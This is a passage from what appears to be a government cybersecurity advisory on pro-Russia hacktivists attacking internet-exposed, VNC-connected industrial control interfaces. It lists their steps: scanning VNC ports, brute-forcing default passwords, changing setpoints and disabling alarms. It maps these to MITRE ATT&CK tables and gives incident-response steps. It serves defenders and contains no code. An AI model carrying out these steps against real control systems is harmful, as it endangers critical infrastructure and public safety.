&lt;p&gt;Pro-Russia hacktivist groups employ easily disseminated and replicated TTPs across various entities, increasing the likelihood of widespread adoption and escalating the frequency of intrusions. These groups have limited capabilities, frequently misunderstanding the processes they aim to disrupt. Their apparent low level of technical knowledge results in haphazard attacks where actors intend to cause physical damage but cannot accurately anticipate actual impact. Despite these limitations, the authoring organizations have observed these groups willfully cause actual harm to vulnerable critical infrastructure.&lt;/p&gt;
&lt;p&gt;Pro-Russia hacktivist groups use the TTPs in this Cybersecurity Advisory to target virtual network computing (VNC)-connected HMI devices. These groups are primarily seeking notoriety with their actions. While they have caused damage in some instances, they regularly make false or exaggerated claims about their attacks on critical infrastructure to garner more attention. They frequently misrepresent their capabilities and the impacts of their actions, portraying minor incursions as significant breaches, but such incursions can still lead to lost time and resources for operators remediating systems.&lt;/p&gt;
&lt;p&gt;Additionally, pro-Russia hacktivists use an opportunistic targeting methodology. They leverage superficial criteria, such as victim availability and existing vulnerabilities, rather than focusing on strategically significant entities. Their lack of strategic focus can lead to a broad array of targets, ranging from water treatment facilities to oil well systems. Pro-Russia hacktivists have demonstrated a pattern of frequently taking advantage of the widespread availability of vulnerable VNC connections. While system owners typically use VNC connections for legitimate remote system access functions, threat actors can maliciously use these connections to broadly target numerous platforms and services. Consequently, these groups can indiscriminately compromise critical infrastructure entities, including those in the &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot; title=&quot;Water and Wastewater Sector&quot;&gt;Water and Wastewater&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector&quot; title=&quot;Food and Agriculture Sector&quot; data-entity-type=&quot;external&quot;&gt;Food and Agriculture&lt;/a&gt;, and &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector&quot; title=&quot;Energy Sector&quot;&gt;Energy&lt;/a&gt; Sectors.&lt;/p&gt;
&lt;p&gt;Pro-Russia hacktivist groups have successfully targeted supervisory control and data acquisition (SCADA) networks using basic methods, and in some cases, performed simultaneous DDoS attacks against targeted networks to facilitate SCADA intrusions. As recently as April 2025, threat actors used the following unsophisticated TTPs to access networks and conduct SCADA intrusions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Scan for vulnerable devices on the internet [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0883/&quot; target=&quot;_blank&quot; title=&quot;T0883&quot; data-entity-type=&quot;external&quot;&gt;T0883&lt;/a&gt;] with open VNC ports [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1595/002/&quot; target=&quot;_blank&quot; title=&quot;T1595.002&quot; data-entity-type=&quot;external&quot;&gt;T1595.002&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Initiate temporary virtual private server (VPS) [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1583/003/&quot; target=&quot;_blank&quot; title=&quot;T1583.003&quot; data-entity-type=&quot;external&quot;&gt;T1583.003&lt;/a&gt;] to execute password brute force software.&lt;/li&gt;
&lt;li&gt;Use VNC software to access hosts [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1021/005/&quot; target=&quot;_blank&quot; title=&quot;T1021.005&quot; data-entity-type=&quot;external&quot;&gt;T1021.005&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Confirm connection to the vulnerable device [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0886/&quot; target=&quot;_blank&quot; title=&quot;T0886&quot; data-entity-type=&quot;external&quot;&gt;T0886&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Brute force the password, if required [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1110/003/&quot; target=&quot;_blank&quot; title=&quot;T1110.003&quot; data-entity-type=&quot;external&quot;&gt;T1110.003&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Gain access to HMI devices [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0883/&quot; target=&quot;_blank&quot; title=&quot;T0883&quot; data-entity-type=&quot;external&quot;&gt;T0883&lt;/a&gt;], typically with default [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0812/&quot; target=&quot;_blank&quot; title=&quot;T0812&quot; data-entity-type=&quot;external&quot;&gt;T0812&lt;/a&gt;], weak, or no passwords [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0859/&quot; target=&quot;_blank&quot; title=&quot;T0859&quot; data-entity-type=&quot;external&quot;&gt;T0859&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Log the confirmed vulnerable device IP address, port, and password.&lt;/li&gt;
&lt;li&gt;Using the HMI graphical interface [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0823/&quot; target=&quot;_blank&quot; title=&quot;T0823&quot; data-entity-type=&quot;external&quot;&gt;T0823&lt;/a&gt;], capture screen recordings or intermittent screenshots while conducting the following actions, intending to affect productivity and cause additional costs [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0828/&quot; target=&quot;_blank&quot; title=&quot;T0828&quot; data-entity-type=&quot;external&quot;&gt;T0828&lt;/a&gt;]:
&lt;ul&gt;
&lt;li&gt;Modify usernames/passwords [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0892/&quot; target=&quot;_blank&quot; title=&quot;T0892&quot; data-entity-type=&quot;external&quot;&gt;T0892&lt;/a&gt;];&lt;/li&gt;
&lt;li&gt;Modify parameters [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0836/&quot; target=&quot;_blank&quot; title=&quot;T0836&quot; data-entity-type=&quot;external&quot;&gt;T0836&lt;/a&gt;];&lt;/li&gt;
&lt;li&gt;Modify device name [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0892/&quot; target=&quot;_blank&quot; title=&quot;T0892&quot; data-entity-type=&quot;external&quot;&gt;T0892&lt;/a&gt;];&lt;/li&gt;
&lt;li&gt;Modify instrument settings [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0831/&quot; target=&quot;_blank&quot; title=&quot;T0831&quot; data-entity-type=&quot;external&quot;&gt;T0831&lt;/a&gt;];&lt;/li&gt;
&lt;li&gt;Disable alarms [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0878/&quot; target=&quot;_blank&quot; title=&quot;T0878&quot; data-entity-type=&quot;external&quot;&gt;T0878&lt;/a&gt;];&lt;/li&gt;
&lt;li&gt;Create loss of view (a technique that mandates local hands-on operator intervention) [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0829/&quot; target=&quot;_blank&quot; title=&quot;T0829&quot; data-entity-type=&quot;external&quot;&gt;T0829&lt;/a&gt;]; and/or&lt;/li&gt;
&lt;li&gt;Device restart or shutdown [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0816/&quot; target=&quot;_blank&quot; title=&quot;T0816&quot; data-entity-type=&quot;external&quot;&gt;T0816&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Disconnect from the device, ending the VNC connection.&lt;/li&gt;
&lt;li&gt;Research the compromised device company after the intrusion [&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1591/&quot; target=&quot;_blank&quot; title=&quot;T1591&quot; data-entity-type=&quot;external&quot;&gt;T1591&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Propagation&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;To reach a wider audience, pro-Russia hacktivist groups work together, amplify each other’s posts, create additional groups to amplify their own posts, and likely share TTPs. For example, Z-Pentest jointly claimed intrusion of a U.S. system with Sector16. Sector16 later began posting additional intrusions for which the group claimed sole responsibility. It is likely that these and similar groups will continue to iterate and share these methods to disrupt critical infrastructure organizations.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Reconnaissance and Initial Access&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;The threat actors’ intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate. These pro-Russia hacktivist groups abuse popular internet-scraping tools, such as &lt;code&gt;Nmap&lt;/code&gt; or &lt;code&gt;OPENVAS&lt;/code&gt;, to search for visible VNC services and use brute force password spraying tools to access devices via known default or otherwise weak credentials. Threat actors typically search for these services on the default port &lt;code&gt;5900&lt;/code&gt; or other nearby ports (&lt;code&gt;5901-5910&lt;/code&gt;). Their goal is to gain remote access to HMI devices connected to live control networks.&lt;/p&gt;
&lt;p&gt;Once threat actors obtain access, they manipulate available settings from the graphical user interface (GUI) on the HMI devices, such as arbitrary physical parameter and setpoint changes, or conduct defacement activities. Because pro-Russia hacktivist groups seem to lack sector-specific expertise or cyber-physical engineering knowledge, they currently cannot reliably estimate the true impact of their actions. Regardless of outcome, pro-Russia hacktivist groups often post images and screen recordings to their social media platforms, boasting the compromises and exaggerating impacts to garner attention from their peers and the media.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;While pro-Russia hacktivist groups currently demonstrate limited ability to consistently cause significant impact, there is a risk that their continued attacks will result in further harm or grievous physical consequences. Attacks have not yet caused injury; however, the attacks against occupied factories and community facilities demonstrate a lack of consideration for human safety.&lt;/p&gt;
&lt;p&gt;Victim organizations reported that the most common operational impact caused by these threat actors is a temporary loss of view, necessitating manual intervention to manage processes. However, any modifications to programmatic and systematic procedures can result in damage or disruption, including substantial labor costs from hiring a programmable logic controller programmer to restore operations, costs associated with operational downtime, and potential costs for network remediation.&lt;/p&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;MITRE&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table1&quot; title=&quot;Table 1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt; to &lt;a href=&quot;#Table10&quot; title=&quot;Table 10&quot;&gt;&lt;strong&gt;Table 10&lt;/strong&gt;&lt;/a&gt; for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;amp;CK framework, see CISA and MITRE ATT&amp;amp;CK’s &lt;a href=&quot;https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping&quot; title=&quot;Best Practices for MITRE ATT&amp;amp;CK Mapping&quot;&gt;Best Practices for MITRE ATT&amp;amp;CK Mapping&lt;/a&gt; and CISA’s &lt;a href=&quot;https://github.com/cisagov/Decider/&quot; title=&quot;Decider Tool&quot;&gt;Decider Tool&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table1&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 1. Reconnaissance&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Gather Victim Organization Information&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1591/&quot; target=&quot;_blank&quot; title=&quot;T1591&quot; data-entity-type=&quot;external&quot;&gt;T1591&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors use information available on the internet to determine what systems they believe they have compromised and post the information on their social media. This methodology frequently leads to the threat actors misidentifying their claimed victims.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Active Scanning: Vulnerability Scanning&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1595/002/&quot; target=&quot;_blank&quot; title=&quot;T1595.002&quot; data-entity-type=&quot;external&quot;&gt;T1595.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors use open source tools to look for IP addresses in target countries with visible VNC services on common ports.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 2. Resource Development&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Acquire Infrastructure: Virtual Private Server&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1583/003/&quot; target=&quot;_blank&quot; title=&quot;T1583.003&quot; data-entity-type=&quot;external&quot;&gt;T1583.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors use virtual infrastructure to obfuscate identifiers.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 3. Initial Access&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Internet Accessible Device&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0883/&quot; target=&quot;_blank&quot; title=&quot;T0883&quot; data-entity-type=&quot;external&quot;&gt;T0883&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors gain access through less secure HMI devices exposed to the internet.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 4. Persistence&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Valid Accounts&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0859/&quot; target=&quot;_blank&quot; title=&quot;T0859&quot; data-entity-type=&quot;external&quot;&gt;T0859&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors use password guessing tools to access legitimate accounts on the HMI devices.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 5. Credential Access&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Brute Force: Password Spraying&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1110/003/&quot; target=&quot;_blank&quot; title=&quot;T1110.003&quot; data-entity-type=&quot;external&quot;&gt;T1110.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors use tools to rapidly guess common or simple passwords.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 6. Lateral Movement&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Default Credentials&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0812/&quot; target=&quot;_blank&quot; title=&quot;T0812&quot; data-entity-type=&quot;external&quot;&gt;T0812&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors seek and build libraries of known default passwords for control devices to access legitimate user accounts.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote Services&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0886/&quot; target=&quot;_blank&quot; title=&quot;T0886&quot; data-entity-type=&quot;external&quot;&gt;T0886&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors leverage VNC services to access system HMI devices.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote Services: VNC&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1021/005/&quot; target=&quot;_blank&quot; title=&quot;T1021.005&quot; data-entity-type=&quot;external&quot;&gt;T1021.005&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors hunt VNC-enabled devices visible on the internet and connect with remote viewer software.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 7. Execution&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Graphical User Interface&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0823/&quot; target=&quot;_blank&quot; title=&quot;T0823&quot; data-entity-type=&quot;external&quot;&gt;T0823&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors interact with HMI devices via GUIs, attempting to modify control devices.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 8. Inhibit Response Function&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Device Restart/Shutdown&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0816/&quot; target=&quot;_blank&quot; title=&quot;T0816&quot; data-entity-type=&quot;external&quot;&gt;T0816&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;While threat actors claim to turn off HMIs, it is possible that operators (not the threat actors) turn the devices off during incident response.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Alarm Suppression&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0878/&quot; target=&quot;_blank&quot; title=&quot;T0878&quot; data-entity-type=&quot;external&quot;&gt;T0878&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors use HMI interfaces to clear alarms caused by their activity and alarms already present on the system at the time of their intrusion.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Change Credential&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0892/&quot; target=&quot;_blank&quot; title=&quot;T0892&quot; data-entity-type=&quot;external&quot;&gt;T0892&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors change the usernames and passwords of HMI devices in operator lockout attempts, usually resulting in a loss of view and operators switching to manual operations.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 9. Impair Process Control&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Modify Parameter&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0836/&quot; target=&quot;_blank&quot; title=&quot;T0836&quot; data-entity-type=&quot;external&quot;&gt;T0836&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors attempt to change upper and lower limits of operational devices as available from the HMI.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unauthorized Command Message&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/techniques/T0855/&quot; target=&quot;_blank&quot; title=&quot;T0855&quot; data-entity-type=&quot;external&quot;&gt;T0855&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors attempt to send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, causing possible impact.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;Table 10. Impact&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table10&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&lt;/a&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Loss of Productivity and Revenue&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T0828/&quot; target=&quot;_blank&quot; title=&quot;T0828&quot; data-entity-type=&quot;external&quot;&gt;T0828&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors purposefully attempt to impact productivity and create additional costs for the affected entities.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Loss of View&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v15/techniques/T0829/&quot; target=&quot;_blank&quot; title=&quot;T0829&quot; data-entity-type=&quot;external&quot;&gt;T0829&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors change credentials on HMI devices, preventing operators from modifying processes remotely.&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manipulation of Control&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v15/techniques/T0831/&quot; target=&quot;_blank&quot; title=&quot;T0831&quot; data-entity-type=&quot;external&quot;&gt;T0831&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Threat actors change setpoints in processes, impacting the efficiency of operations for those specific processes. &amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Incident Response&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If organizations find exposed systems with weak or default passwords, they should assume threat actors compromised the system and begin the following incident response protocols:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Determine which hosts were compromised and isolate them&lt;/strong&gt; by quarantining or taking them offline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Initiate threat hunting activities to scope the intrusion&lt;/strong&gt;. Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reimage compromised hosts&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Provision new account credentials&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Report the compromise to CISA, FBI, and/or NSA&lt;/strong&gt;. See the &lt;a href=&quot;#Contact&quot; title=&quot;Contact Information&quot;&gt;&lt;strong&gt;Contact Information&lt;/strong&gt;&lt;/a&gt; section of this advisory.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Harden the network to prevent additional malicious activity&lt;/strong&gt;. See the &lt;a href=&quot;#Mitigations&quot; title=&quot;Mitigations &quot;&gt;&lt;strong&gt;Mitigations &lt;/strong&gt;&lt;/a&gt;section of this advisory for guidance.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;OT Asset Owners and Operators&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The authoring organizations recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s &lt;a href=&quot;https://www.cisa.gov/cross-sector-cybersecurity-performance-goals&quot; title=&quot;CPGs&quot;&gt;CPGs webpage&lt;/a&gt; for more information on the CPGs, including additional recommended baseline protections.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reduce exposure of OT assets to the public-facing internet.&lt;/strong&gt; When connected to the internet, OT devices are easy targets for malicious cyber threat actors. Many devices can be found by searching for open ports on public IP ranges with search engine tools to target victims with OT components [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#SecureInternetFacingDevices3S&quot; title=&quot;CPG 3.S&quot;&gt;CPG 3.S&lt;/a&gt;].
&lt;ul&gt;
